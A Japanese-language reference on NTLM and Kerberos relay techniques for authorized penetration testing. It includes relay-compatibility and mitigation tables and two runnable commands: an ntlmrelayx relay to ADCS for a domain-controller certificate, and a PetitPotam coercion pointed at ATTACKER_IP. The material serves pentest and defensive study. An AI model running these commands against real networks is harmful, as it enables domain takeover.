
複数のリレー技術に関するテクニカルリファレンス
認可された内部ペネトレーションテスト中におけるNTLMリレー攻撃の包括的なリファレンスです。認証の基礎、認証強制テクニック、プロトコル別のリレーターゲット、ツール、高度なチェイニング、防御策をカバーしています。
最新(CVE-2019-1040以後)のパッチ適用済み環境におけるクラシックなNTLMリレーに適用されます。より詳細なクロスプロトコルの内訳については、クロスプロトコルリレーを参照してください。
* ターゲットがSMB署名を要求しないこと † SMB由来のNTLMはNEGOTIATEに署名フラグを含んでおり、LDAPとADCS HTTPはこれを強制します — そのため、リレーされたセッションは攻撃者が保持していない署名キーを要求することになります。これが、LDAPおよびADCSリレーにおいてWebDAV/HTTP由来の認証が優先される理由です。
Cymulate / CVE-2026-20929プリミティブ(2026年1月) — 攻撃者がCNAMEでDNSをポイズニングし、WindowsがSPNを正規化し、クライアントが攻撃者の選択したターゲット向けのTGSを要求し、AP-REQがリレーされます。多くのサービスがSPNのDNS部分のみに基づいてチケットを受け入れるため、ソースSPNのクラスはNTLMリレーほど重要ではありません — 攻撃を制限するのは、ターゲットサービスが独自のアンチリレー制御を強制するかどうかです。
すべての行は、攻撃者がDNSをポイズニングできるネットワーク上の位置(mitm6経由のDHCPv6、ARP、不正DHCPv4)にいることを前提としています。完全なテクニック: DNS CNAME悪用によるKerberosリレー。
# Classic example: coerce DC, relay to ADCS for a DC certificate
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
python3 PetitPotam.py ATTACKER_IP DC_IP
| ソース認証 | → SMB | → LDAP | → MSSQL | → HTTP | → ADCS | → SOCKS |
|---|
| SMB | ✅* | ❌† | ✅ | ✅ | ❌† | ✅ |
| HTTP | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
| WebDAV | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
| MSSQL | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
| ターゲットサービス | リレー可能、ただし... | パッチ / ステータス |
|---|
| SMB | ターゲットでSMB署名が必須 | — |
| LDAP | LDAP署名が必須 | — |
| LDAPS | LdapEnforceChannelBinding = 2 (Always) | — |
| HTTP / IIS | HTTP CBTが強制される(HTTP.sysトークンチェック = Require) | CVE-2026-20929がHTTP.sys CBTをバックポート |
ADCS /certsrv/ | vdirでExtended Protection = Require | HTTP.sys CBT(CVE-2026-20929経由)が適用 |
| MSSQL | Extended Protectionが有効 | — |
| Exchange (OWA/ECP/…) | すべての仮想ディレクトリでEPA | — |